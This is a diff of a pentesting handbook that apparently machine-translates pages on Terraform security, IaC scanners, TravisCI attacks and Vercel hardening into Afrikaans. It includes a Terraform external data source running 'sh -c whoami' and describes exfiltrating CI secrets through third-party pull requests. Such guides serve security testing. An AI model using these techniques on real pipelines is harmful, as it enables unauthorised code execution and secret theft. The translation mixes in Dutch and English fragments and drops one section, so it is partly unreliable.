```terraform data "external" "example" { - program = ["sh", "-c", "whoami"] +program = ["sh", "-c", "whoami"] } ``` +## Outomatiese Oudit Gereedskap -## Automatic Audit Tools +### [**Snyk Infrastruktur as Kode (IaC)**](https://snyk.io/product/infrastructure-as-code-security/) -### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/) - -Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats. - -- **Features:** - - Real-time scanning for security vulnerabilities and compliance issues. - - Integration with version control systems (GitHub, GitLab, Bitbucket). - - Automated fix pull requests. - - Detailed remediation advice. -- **Sign Up:** Create an account on [Snyk](https://snyk.io/). +Snyk bied 'n omvattende Infrastruktur as Kode (IaC) skandeeroplossing wat kwesbaarhede en verkeerde konfigurasies in Terraform, CloudFormation, Kubernetes, en ander IaC formate opspoor. +- **Kenmerke:** +- Regs-tijd skandering vir sekuriteitskwesbaarhede en nakomingskwessies. +- Integrasie met weergawebeheer stelsels (GitHub, GitLab, Bitbucket). +- Outomatiese regstelling trek versoeke. +- Gedetailleerde hersteladvies. +- **Teken In:** Skep 'n rekening op [Snyk](https://snyk.io/). ```bash brew tap snyk/tap brew install snyk snyk auth snyk iac test /path/to/terraform/code ``` - ### [Checkov](https://github.com/bridgecrewio/checkov) -**Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages. +**Checkov** is 'n statiese kode analise hulpmiddel vir infrastruktuur as kode (IaC) en ook 'n sagteware samestelling analise (SCA) hulpmiddel vir beelde en oopbron pakkette. 
-It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), or [OpenTofu](https://opentofu.org/) and detects security and compliance misconfigurations using graph-based scanning. - -It performs [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs). 
+Dit skandeer wolk infrastruktuur wat voorsien is met behulp van [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), of [OpenTofu](https://opentofu.org/) en detecteer sekuriteits- en nakomingsmisconfigurasies met behulp van graf-gebaseerde skandering. +Dit voer [Sagteware Samestelling Analise (SCA) skandering](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) uit wat 'n skandering van oopbron pakkette en beelde vir Algemene Kw vulnerabilities en Blootstellings (CVEs) is. 
```bash pip install checkov checkov -d /path/to/folder ``` - ### [terraform-compliance](https://github.com/terraform-compliance/cli) -From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code. +From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is 'n liggewig, sekuriteit en nakoming gefokusde toetsraamwerk teenoor terraform om negatiewe toetsing vermoĂ« vir jou infrastruktuur-as-kode moontlik te maak. -- **compliance:** Ensure the implemented code is following security standards, your own custom standards -- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ? -- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/) -- **pre-deploy:** it validates your code before it is deployed -- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated. -- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible. +- **compliance:** Verseker dat die geĂŻmplementeerde kode sekuriteitsstandaarde en jou eie pasgemaakte standaarde volg +- **behaviour driven development:** Ons het BDD vir byna alles, hoekom nie vir IaC nie? +- **portable:** installeer dit net vanaf `pip` of hardloop dit via `docker`. Sien [Installation](https://terraform-compliance.com/pages/installation/) +- **pre-deploy:** dit valideer jou kode voordat dit ontplooi word +- **easy to integrate:** dit kan in jou pyplyn (of in git hooks) hardloop om te verseker dat alle ontplooiings gevalideer word. +- **segregation of duty:** jy kan jou toetse in 'n ander repository hou waar 'n aparte span verantwoordelik is. 
> [!NOTE] -> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool. - +> Ongelukkig, as die kode sommige verskaffers gebruik waartoe jy nie toegang het nie, sal jy nie in staat wees om die `terraform plan` uit te voer en hierdie hulpmiddel te gebruik nie. ```bash pip install terraform-compliance terraform plan -out=plan.out terraform-compliance -f /path/to/folder ``` - ### [tfsec](https://github.com/aquasecurity/tfsec) -From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations. - -- ☁ Checks for misconfigurations across all major (and some minor) cloud providers -- ⛔ Hundreds of built-in rules -- đŸȘ† Scans modules (local and remote) -- ➕ Evaluates HCL expressions as well as literal values -- â†Ș Evaluates Terraform functions e.g. `concat()` -- 🔗 Evaluates relationships between Terraform resources -- 🧰 Compatible with the Terraform CDK -- 🙅 Applies (and embellishes) user-defined Rego policies -- 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif. -- đŸ› ïž Configurable (via CLI flags and/or config file) -- ⚡ Very fast, capable of quickly scanning huge repositories +From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec gebruik statiese analise van jou terraform kode om potensiĂ«le miskonfigurasies op te spoor. +- ☁ Kontroleer vir miskonfigurasies oor alle groot (en sommige klein) wolkverskaffers +- ⛔ Honderde ingeboude reĂ«ls +- đŸȘ† Skandeer modules (plaaslik en afstand) +- ➕ Evalueer HCL-uitdrukkings sowel as letterlike waardes +- â†Ș Evalueer Terraform funksies bv. 
`concat()` +- 🔗 Evalueer verhoudings tussen Terraform hulpbronne +- 🧰 Kompatibel met die Terraform CDK +- 🙅 Pas (en versier) gebruiker-gedefinieerde Rego-beleide toe +- 📃 Ondersteun verskeie uitvoerformate: pragtig (verstek), JSON, SARIF, CSV, CheckStyle, JUnit, teks, Gif. +- đŸ› ïž Konfigureerbaar (via CLI-vlaggies en/of konfigurasie lĂȘer) +- ⚡ Baie vinnig, in staat om vinnig enorme repositories te skandeer ```bash brew install tfsec tfsec /path/to/folder ``` - ### [KICKS](https://github.com/Checkmarx/kics) -Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with **KICS** by Checkmarx. - -**KICS** stands for **K**eeping **I**nfrastructure as **C**ode **S**ecure, it is open source and is a must-have for any cloud native project. +Vind sekuriteitskwesbaarhede, nakomingskwessies en infrastruktuur miskonfigurasies vroeg in die ontwikkelingsiklus van jou infrastruktuur-as-kode met **KICS** deur Checkmarx. +**KICS** staan vir **K**eeping **I**nfrastructure as **C**ode **S**ecure, dit is oopbron en is 'n moet-hĂȘ vir enige wolk-natiewe projek. ```bash docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/" ``` - ### [Terrascan](https://github.com/tenable/terrascan) -From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to: - -- Seamlessly scan infrastructure as code for misconfigurations. -- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture. -- Detect security vulnerabilities and compliance violations. -- Mitigate risks before provisioning cloud native infrastructure. -- Offers flexibility to run locally or integrate with your CI\CD. +Van die [**docs**](https://github.com/tenable/terrascan): Terrascan is 'n statiese kode-analiseerder vir Infrastruktur as Kode. 
Terrascan stel jou in staat om: +- Naadloos infrastruktuur as kode te skandeer vir verkeerde konfigurasies. +- Geprovisioneerde wolkinfrastruktuur te monitor vir konfigurasiewijzigings wat posisie-afwykings inbring, en stel jou in staat om na 'n veilige posisie terug te keer. +- Sekuriteitskwesbaarhede en nakomingsoortredings te ontdek. +- Risiko's te verminder voordat wolk-natiewe infrastruktuur geprovisioneer word. +- Bied buigsaamheid om plaaslik te loop of te integreer met jou CI\CD. ```bash brew install terrascan ``` - -## References +## Verwysings - [Atlantis Security](atlantis-security.md) - [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce) @@ -310,7 +280,3 @@ brew install terrascan - [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/todo.md b/src/pentesting-ci-cd/todo.md index 63a3bb5c8..0d9f6b765 100644 --- a/src/pentesting-ci-cd/todo.md +++ b/src/pentesting-ci-cd/todo.md @@ -2,7 +2,7 @@ {{#include ../banners/hacktricks-training.md}} -Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective +Github PRs is welkom wat verduidelik hoe om (mis)bruik te maak van daardie platforms vanuit 'n aanvaller se perspektief - Drone - TeamCity @@ -11,10 +11,6 @@ Github PRs are welcome explaining how to (ab)use those platforms from an attacke - Rancher - Mesosphere - Radicle -- Any other CI/CD platform... +- Enige ander CI/CD platform... {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/travisci-security/README.md b/src/pentesting-ci-cd/travisci-security/README.md index cff623392..89c721c72 100644 --- a/src/pentesting-ci-cd/travisci-security/README.md +++ b/src/pentesting-ci-cd/travisci-security/README.md 
@@ -1,69 +1,65 @@ -# TravisCI Security +# TravisCI Veiligheid {{#include ../../banners/hacktricks-training.md}} -## What is TravisCI +## Wat is TravisCI -**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**. +**Travis CI** is 'n **gehoste** of op **plek** **deurlopende integrasie** diens wat gebruik word om sagteware projekte te bou en te toets wat op verskeie **verskillende git platforms** gehost word. {{#ref}} basic-travisci-information.md {{#endref}} -## Attacks +## Aanvalle ### Triggers -To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**: +Om 'n aanval te begin, moet jy eers weet hoe om 'n bou te aktiveer. Standaard sal TravisCI **'n bou aktiveer op stoot en trek versoeke**: ![](<../../images/image (145).png>) #### Cron Jobs -If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build: +As jy toegang het tot die webtoepassing, kan jy **crons stel om die bou te laat loop**, dit kan nuttig wees vir volharding of om 'n bou te aktiveer: ![](<../../images/image (243).png>) > [!NOTE] -> It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162). +> Dit lyk of dit nie moontlik is om crons binne die `.travis.yml` in te stel nie volgens [dit](https://github.com/travis-ci/travis-ci/issues/9162). 
-### Third Party PR +### Derdeparty PR -TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets: +TravisCI deaktiveer standaard die deel van omgewing veranderlikes met PR's wat van derde partye kom, maar iemand mag dit aktiveer en dan kan jy PR's na die repo skep en die geheime uitbring: ![](<../../images/image (208).png>) ### Dumping Secrets -As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines). +Soos verduidelik in die [**basiese inligting**](basic-travisci-information.md) bladsy, is daar 2 tipes geheime. **Omgewing Veranderlikes geheime** (wat op die webblad gelys is) en **aangepaste versleutelde geheime**, wat binne die `.travis.yml` lĂȘer as base64 gestoor word (let daarop dat albei as versleuteld gestoor sal eindig as omgewing veranderlikes in die finale masjiene). -- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build. -- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**. 
-- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as: +- Om **geheime** wat as **Omgewing Veranderlikes** geconfigureer is te **nommer**, gaan na die **instellings** van die **projek** en kyk na die lys. Let egter daarop dat al die projek omgewing veranderlikes wat hier gestel is, sal verskyn wanneer 'n bou geaktiveer word. +- Om die **aangepaste versleutelde geheime** te nommer, is die beste wat jy kan doen om die **`.travis.yml` lĂȘer** te **kontroleer**. +- Om **versleutelde lĂȘers** te nommer, kan jy kyk vir **`.enc` lĂȘers** in die repo, vir lyne soortgelyk aan `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in die konfigurasielĂȘer, of vir **versleutelde iv en sleutels** in die **Omgewing Veranderlikes** soos: ![](<../../images/image (81).png>) ### TODO: -- Example build with reverse shell running on Windows/Mac/Linux -- Example build leaking the env base64 encoded in the logs +- Voorbeeld bou met omgekeerde skulp wat op Windows/Mac/Linux loop +- Voorbeeld bou wat die omgewing base64 geĂ«nkodeer in die logs lek ### TravisCI Enterprise -If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to: +As 'n aanvaller in 'n omgewing eindig wat **TravisCI enterprise** gebruik (meer inligting oor wat dit is in die [**basiese inligting**](basic-travisci-information.md#travisci-enterprise)), sal hy in staat wees om **bou te 
aktiveer in die Werker.** Dit beteken dat 'n aanvaller in staat sal wees om lateraal na daardie bediener te beweeg waarvandaan hy in staat sal wees om: -- escape to the host? -- compromise kubernetes? -- compromise other machines running in the same network? -- compromise new cloud credentials? +- na die gasheer te ontsnap? +- kubernetes te kompromitteer? +- ander masjiene wat in dieselfde netwerk loop te kompromitteer? +- nuwe wolk geloofsbriewe te kompromitteer? -## References +## Verwysings - [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/) - [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md index 46b10bf38..6ff1e3ac2 100644 --- a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md +++ b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md 
@@ -2,47 +2,44 @@ {{#include ../../banners/hacktricks-training.md}} -## Access +## Toegang -TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI. +TravisCI integreer direk met verskillende git platforms soos Github, Bitbucket, Assembla, en Gitlab. Dit sal die gebruiker vra om TravisCI toestemming te gee om toegang te verkry tot die repos wat hy wil integreer met TravisCI. -For example, in Github it will ask for the following permissions: +Byvoorbeeld, in Github sal dit vir die volgende toestemmings vra: -- `user:email` (read-only) -- `read:org` (read-only) -- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations. +- `user:email` (slegs lees) +- `read:org` (slegs lees) +- `repo`: Gee lees- en skryftoegang tot kode, verbintenisstatusse, samewerkers, en ontplooiingstatusse vir openbare en private repositories en organisasies. -## Encrypted Secrets +## GeĂ«nkripteerde Geheime -### Environment Variables +### Omgewing Veranderlikes -In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build. +In TravisCI, soos in ander CI platforms, is dit moontlik om **geheime op repo vlak te stoor** wat geĂ«nkripteer gestoor sal word en **ontsleutel en in die omgewing veranderlike** van die masjien wat die bou uitvoer, gepush sal word. ![](<../../images/image (203).png>) -It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will). 
+Dit is moontlik om die **takke aan te dui waartoe die geheime beskikbaar gaan wees** (standaard is dit alles) en ook of TravisCI **sy waarde moet wegsteek** as dit **in die logs** verskyn (standaard sal dit). -### Custom Encrypted Secrets +### Pasgemaakte GeĂ«nkripteerde Geheime -For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repository’s **public key available** to those who have **access** to the repository. - -You can access the public key of one repo with: +Vir **elke repo** genereer TravisCI 'n **RSA sleutelpaar**, **hou** die **privaat** een, en maak die repository se **publieke sleutel beskikbaar** vir diegene wat **toegang** tot die repository het. +Jy kan die publieke sleutel van een repo met toegang: ``` travis pubkey -r / travis pubkey -r carlospolop/t-ci-test ``` - -Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**. +Dan kan jy hierdie opstelling gebruik om **geheime te enkripteer en dit by jou `.travis.yaml` te voeg**. Die geheime sal **ontsleuteld word wanneer die bou gedoen word** en toeganklik wees in die **omgewing veranderlikes**. ![](<../../images/image (139).png>) -Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings. +Let daarop dat die geheime wat op hierdie manier geĂ«nkripteer is, nie in die omgewing veranderlikes van die instellings gelys sal word nie. -### Custom Encrypted Files - -Same way as before, TravisCI also allows to **encrypt files and then decrypt them during the build**: +### Pasgemaakte GeĂ«nkripteerde LĂȘers +Op dieselfde manier as voorheen, laat TravisCI ook toe om **lĂȘers te enkripteer en dit tydens die bou te ontsleutel**: ``` travis encrypt-file super_secret.txt -r carlospolop/t-ci-test 
@@ -52,7 +49,7 @@ storing secure env variables for decryption Please add the following to your build script (before_install stage in your .travis.yml, for instance): - openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d +openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d Pro Tip: You can add it automatically by running with --add. 
@@ -60,37 +57,32 @@ Make sure to add super_secret.txt.enc to the git repository. Make sure not to add super_secret.txt to the git repository. Commit all changes to your .travis.yml. ``` - Note that when encrypting a file 2 Env Variables will be configured inside the repo such as: ![](<../../images/image (170).png>) ## TravisCI Enterprise -Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deploy **in your infrastructure**. Think of the ‘server’ version of Travis CI. Using Travis CI allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment, which you can configure and secure as you want to. +Travis CI Enterprise is 'n **on-prem weergawe van Travis CI**, wat jy kan ontplooi **in jou infrastruktuur**. Dink aan die ‘bediener’ weergawe van Travis CI. Deur Travis CI te gebruik, kan jy 'n maklik-om-te-gebruik KontinuĂŻteitsintegrasie/KontinuĂŻteitsontplooiing (CI/CD) stelsel in 'n omgewing inskakel, wat jy kan konfigureer en beveilig soos jy wil. -**Travis CI Enterprise consists of two major parts:** +**Travis CI Enterprise bestaan uit twee hoofdele:** -1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc. -2. TCI **Worker** and build environment images (also called OS images). +1. TCI **dienste** (of TCI Kern Dienste), verantwoordelik vir integrasie met weergawebeheer stelsels, die autorisering van boue, die skedulering van bouwerk, ens. +2. TCI **Werker** en bou omgewing beelde (ook genoem OS beelde). -**TCI Core services require the following:** +**TCI Kern dienste vereis die volgende:** -1. A **PostgreSQL11** (or later) database. -2. An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required -3. 
Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see the [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details. +1. 'n **PostgreSQL11** (of later) databasis. +2. 'n infrastruktuur om 'n Kubernetes-kluster te ontplooi; dit kan in 'n bedienerkluster of op 'n enkele masjien ontplooi word indien nodig. +3. Afhangende van jou opstelling, wil jy dalk sommige van die komponente op jou eie ontplooi en konfigureer, bv. RabbitMQ - sien die [Instelling van Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) vir meer besonderhede. -**TCI Worker requires the following:** +**TCI Werker vereis die volgende:** -1. An infrastructure where a docker image containing the **Worker and a linked build image can be deployed**. -2. Connectivity to certain Travis CI Core Services components - see the [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details. +1. 'n infrastruktuur waar 'n docker beeld wat die **Werker en 'n gekoppelde boubeeld kan ontplooi**. +2. Verbondenheid met sekere Travis CI Kern Dienste komponente - sien die [Instelling van Werker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) vir meer besonderhede. -The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure. +Die hoeveelheid ontplooide TCI Werker en bou omgewing OS beelde sal die totale gelyktydige kapasiteit van Travis CI Enterprise ontplooiing in jou infrastruktuur bepaal. ![](<../../images/image (199).png>) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/vercel-security.md b/src/pentesting-ci-cd/vercel-security.md index 16dc93da7..23d655946 100644 --- a/src/pentesting-ci-cd/vercel-security.md 
+++ b/src/pentesting-ci-cd/vercel-security.md 
@@ -12,152 +12,149 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro ### General -**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations. +**Purpose:** Bestuur fundamentele projekinstellings soos projeknaam, raamwerk, en boukonfigurasies. #### Security Configurations: - **Transfer** - - **Misconfiguration:** Allows to transfer the project to another team - - **Risk:** An attacker could steal the project +- **Misconfiguration:** Laat toe om die projek na 'n ander span oor te dra +- **Risk:** 'n Aanvaller kan die projek steel - **Delete Project** - - **Misconfiguration:** Allows to delete the project - - **Risk:** Delete the prject +- **Misconfiguration:** Laat toe om die projek te verwyder +- **Risk:** Verwyder die projek --- ### Domains -**Purpose:** Manage custom domains, DNS settings, and SSL configurations. +**Purpose:** Bestuur pasgemaakte domeine, DNS-instellings, en SSL-konfigurasies. #### Security Configurations: - **DNS Configuration Errors** - - **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers. - - **Risk:** Domain hijacking, traffic interception, and phishing attacks. +- **Misconfiguration:** Onakkurate DNS rekords (A, CNAME) wat na kwaadwillige bedieners wys. +- **Risk:** Domein kaap, verkeersafluistering, en phishing-aanvalle. - **SSL/TLS Certificate Management** - - **Misconfiguration:** Using weak or expired SSL/TLS certificates. - - **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality. +- **Misconfiguration:** Gebruik van swak of vervalde SSL/TLS sertifikate. +- **Risk:** Kwetsbaar vir man-in-the-middle (MITM) aanvalle, wat data-integriteit en vertroulikheid in gevaar stel. - **DNSSEC Implementation** - - **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings. - - **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks. 
+- **Misconfiguration:** Versuim om DNSSEC in te skakel of onakkurate DNSSEC-instellings. +- **Risk:** Verhoogde kwesbaarheid vir DNS spoofing en cache vergiftiging aanvalle. - **Environment used per domain** - - **Misconfiguration:** Change the environment used by the domain in production. - - **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production. +- **Misconfiguration:** Verander die omgewing wat deur die domein in produksie gebruik word. +- **Risk:** Stel potensiĂ«le geheime of funksies bloot wat nie in produksie beskikbaar moet wees nie. --- ### Environments -**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables. +**Purpose:** Definieer verskillende omgewings (Ontwikkeling, Voorbeeld, Produksie) met spesifieke instellings en veranderlikes. #### Security Configurations: - **Environment Isolation** - - **Misconfiguration:** Sharing environment variables across environments. - - **Risk:** Leakage of production secrets into development or preview environments, increasing exposure. +- **Misconfiguration:** Deel omgewing veranderlikes oor omgewings. +- **Risk:** Lek van produksie geheime in ontwikkeling of voorbeeld omgewings, wat blootstelling verhoog. - **Access to Sensitive Environments** - - **Misconfiguration:** Allowing broad access to production environments. - - **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches. +- **Misconfiguration:** Laat breĂ« toegang tot produksie omgewings toe. +- **Risk:** Ongeoorloofde veranderinge of toegang tot lewendige toepassings, wat tot potensiĂ«le stilstand of datalekke kan lei. --- ### Environment Variables -**Purpose:** Manage environment-specific variables and secrets used by the application. +**Purpose:** Bestuur omgewing-spesifieke veranderlikes en geheime wat deur die toepassing gebruik word. 
#### Security Configurations: - **Exposing Sensitive Variables** - - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. +- **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. +- **Risk:** Blootstelling van API sleutels, databasis akrediteer, of ander sensitiewe data aan die publiek, wat tot datalekke lei. - **Sensitive disabled** - - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. -- **Shared Environment Variables** - - **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information. - - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. +- **Misconfiguration:** As gedeaktiveer (standaard) is dit moontlik om die waardes van die gegenereerde geheime te lees. +- **Risk:** Verhoogde waarskynlikheid van toevallige blootstelling of ongeoorloofde toegang tot sensitiewe inligting. --- ### Git -**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers. +**Purpose:** Konfigureer Git-repository integrasies, tak beskermings, en ontplooiing triggers. #### Security Configurations: - **Ignored Build Step (TODO)** - - **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE. - - **Risk:** TBD +- **Misconfiguration:** Dit lyk of hierdie opsie toelaat om 'n bash skrip/opdragte te konfigureer wat uitgevoer sal word wanneer 'n nuwe verbintenis in Github gepush word, wat RCE kan toelaat. 
+- **Risk:** TBD --- ### Integrations -**Purpose:** Connect third-party services and tools to enhance project functionalities. +**Purpose:** Koppel derdeparty dienste en gereedskap om projek funksionaliteit te verbeter. #### Security Configurations: - **Insecure Third-Party Integrations** - - **Misconfiguration:** Integrating with untrusted or insecure third-party services. - - **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations. +- **Misconfiguration:** Integrasie met onbetroubare of onveilige derdeparty dienste. +- **Risk:** Invoering van kwesbaarhede, datalekke, of agterdeure deur gekompromitteerde integrasies. - **Over-Permissioned Integrations** - - **Misconfiguration:** Granting excessive permissions to integrated services. - - **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions. +- **Misconfiguration:** Te veel toestemmings aan geĂŻntegreerde dienste toeken. +- **Risk:** Ongeoorloofde toegang tot projek hulpbronne, data manipulasie, of diensonderbrekings. - **Lack of Integration Monitoring** - - **Misconfiguration:** Failing to monitor and audit third-party integrations. - - **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches. +- **Misconfiguration:** Versuim om derdeparty integrasies te monitor en te oudit. +- **Risk:** Vertraagde opsporing van gekompromitteerde integrasies, wat die potensiĂ«le impak van sekuriteitsbreuke verhoog. --- ### Deployment Protection -**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments. +**Purpose:** Beveilig ontplooiings deur verskeie beskermingsmeganismes, wat beheer wie toegang kan hĂȘ en ontplooiing na jou omgewings kan doen. #### Security Configurations: **Vercel Authentication** -- **Misconfiguration:** Disabling authentication or not enforcing team member checks. 
